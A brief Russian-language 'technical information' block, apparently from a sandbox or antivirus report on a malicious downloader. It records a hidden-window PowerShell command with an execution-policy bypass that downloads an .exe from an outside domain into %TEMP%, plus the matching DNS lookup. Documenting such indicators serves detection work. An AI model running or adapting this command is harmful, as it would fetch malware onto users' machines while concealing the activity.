Техническая информация
- http://dryversdocumentsandfullcustomsoft.com/adovetmp35891.exe как %temp%\\adov2763890.exe
- '%WINDIR%\syswow64\cmd.exe' /c pOWERsHElL.exe -wINdowStYLE HidDEN -NOPROfIle -eXECUtIoNPoLIcy BypaSS (NEw-OBJECT SySTEm.NEt.WeBCLiENt).DoWNloaDFiLE('http://dryversdocumentsandfullcustomsoft.com/Adovetmp35891.exe','%TEMP%\...
- DNS ASK dr#########mentsandfullcustomsoft.com
- '%WINDIR%\syswow64\cmd.exe' /c pOWERsHElL.exe -wINdowStYLE HidDEN -NOPROfIle -eXECUtIoNPoLIcy BypaSS (NEw-OBJECT SySTEm.NEt.WeBCLiENt).DoWNloaDFiLE('http://dryversdocumentsandfullcustomsoft.com/Adovetmp35891.exe','%TEMP%\... (со скрытым окном)